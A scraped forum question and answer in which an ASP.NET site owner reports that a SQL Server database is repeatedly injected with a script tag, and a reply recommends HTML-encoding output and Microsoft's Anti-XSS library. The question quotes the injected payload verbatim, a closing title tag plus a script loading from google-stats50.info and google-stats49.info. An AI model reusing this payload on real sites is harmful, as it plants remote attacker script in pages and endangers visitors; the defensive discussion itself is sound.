sql server - XSS Attack on the ASP.NET Website -
i in big trouble. please help!!!!!!!!!!
my website has been attacked malicious script < / title> < script src = http : // google-stats50.info/ur.php >. script appended column(s) of table automatically. have removed script. after few hours, re-appeared in tables. time < / title> < script src = http : // google-stats49.info/ur.php >.
my client complaining script. technology used asp.net 1.1, sql server 2005.
please help.
thanks in advance!!!!!!
when render text database can use 2 ways avoid script.
- user server.htmlencode(datafromdatabase);
- use microsoft anti-cross dll library have similar function more options.
last ms anti-xss library now 3.1.
how using video
how pass script.
- on contact or other forms.
- on browser reference on statistics , when browse site, keep log , when go see log script running.
hope help.
Comments
Post a Comment